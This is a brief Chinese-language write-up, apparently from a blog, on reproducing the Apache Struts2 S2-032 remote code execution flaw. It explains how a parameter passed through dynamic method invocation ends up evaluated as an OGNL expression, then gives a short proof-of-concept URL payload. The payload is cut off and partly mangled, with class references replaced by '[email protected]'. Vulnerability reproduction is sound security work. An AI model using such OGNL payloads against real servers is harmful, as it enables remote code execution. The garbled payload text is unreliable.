0x28.Apache Struts2遠程代碼執行漏洞(S2-032)復現

s2-032:啓用動態方法調用後,可能會傳遞可用於在服務器端執行任意代碼的惡意表達式;接收到的參數會經過處理存入到ActionMapping的method屬性中,最後會將method屬性中的值當做ognl表達式執行; poc: ?method:#[email protected]@DEFAULT_MEMBER_ACCESS,#[email protected]@getResponse(),#res
相關文章
相關標籤/搜索